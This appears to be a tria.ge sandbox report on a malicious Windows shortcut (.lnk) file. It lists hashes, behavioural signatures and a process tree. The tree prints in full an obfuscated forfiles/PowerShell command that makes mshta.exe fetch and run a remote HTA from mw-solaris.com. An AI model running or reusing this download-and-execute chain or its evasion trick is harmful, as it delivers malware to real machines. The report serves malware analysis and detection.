Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
89s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12/02/2024, 02:40
Static task
static1
Behavioral task
behavioral1
Sample
61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c.lnk
Resource
win10v2004-20231215-en
General
-
Target
61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c.lnk
-
Size
2KB
-
MD5
572b88eb24399ecb796a86dfe7f9fc59
-
SHA1
65db9c2f7228b938744d25035de0db78af615c14
-
SHA256
61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c
-
SHA512
0381061daff51e7ff875248838710ee3744849ddf4a3557f8ed71aee6ad524ebaacb4bc388c2feb3bd2d1ec257fefbb6a52e8bb9cac68c6b808936979df4bf9e
Malware Config
Extracted
https://mw-solaris.com/solaris.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 6 4296 mshta.exe 18 4296 mshta.exe 21 4296 mshta.exe 24 4296 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5056 powershell.exe 5056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5056 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4960 wrote to memory of 4740 4960 cmd.exe 21 PID 4960 wrote to memory of 4740 4960 cmd.exe 21 PID 4740 wrote to memory of 5056 4740 forfiles.exe 20 PID 4740 wrote to memory of 5056 4740 forfiles.exe 20 PID 5056 wrote to memory of 4296 5056 powershell.exe 23 PID 5056 wrote to memory of 4296 5056 powershell.exe 23
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://mw-solaris.com/solaris.hta2⤵
- Suspicious use of WriteProcessMemory
PID:4740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. \*i*\S*3*\m*ta.e* https://mw-solaris.com/solaris.hta1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://mw-solaris.com/solaris.hta2⤵
- Blocklisted process makes network request
PID:4296
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82